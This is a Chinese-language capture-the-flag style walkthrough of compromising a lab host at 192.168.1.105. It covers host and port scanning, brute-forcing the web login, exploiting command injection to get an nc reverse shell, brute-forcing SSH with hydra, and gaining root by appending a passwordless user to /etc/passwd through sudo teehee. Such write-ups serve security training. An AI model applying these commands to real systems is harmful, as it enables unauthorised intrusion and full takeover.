信息收集

fscan扫描存活主机

PS C:\Users\lenovo\Desktop\HackTool> .\fscan64.exe -h 192.168.1.0/24___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.53    is alive
(icmp) Target 192.168.1.108   is alive
(icmp) Target 192.168.1.1     is alive
(icmp) Target 192.168.1.104   is alive
(icmp) Target 192.168.1.105   is alive
(icmp) Target 192.168.1.109   is alive
[*] Icmp alive hosts len is: 6

确定目标主机是192.168.1.105

namp扫描端口

 nmap -A 192.168.1.105 -p-                                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-20 10:11 CST
Nmap scan report for 192.168.1.105
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
zsh: segmentation fault  nmap -A 192.168.1.105 -p-

开放了22和80端口，直接访问web服务

就一个登录框

暴力破解

直接爆破密码

爆出密码是happy

命令执行

登进去一看是命令执行漏洞

抓包修改参数，查看用户

查看到有三个用户，charles、jim、sam

nc反弹shell

nc -lvp 9999

python切换shell

python3 -c "import pty;pty.spawn('/bin/bash')"

在/home/jim目录下发现文件old-passwords.bak文件，查看，可以作为爆破ssh的密码字典

复制保存到kali

爆破ssh

└─$ sudo hydra -l jim -P pass.txt ssh://192.168.1.105                                    

最后密码是jibril04

登录提示you have mail

存在Charles的密码Password is: ^xHhA&hvim0y

切换用户

su charles

sudo提权

sudo -l

有最追加写入文件功能的时候，直接往 /etc/passwd 里加个root用户

teehee提权

passwd的格式：[⽤户名]：[密码]：[UID]：[GID]：[⾝份描述]：[主⽬录]：[登录shell]
echo "yesir::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

flag

他帮你驱散黑暗，我却带给你光明。可，你心里没有我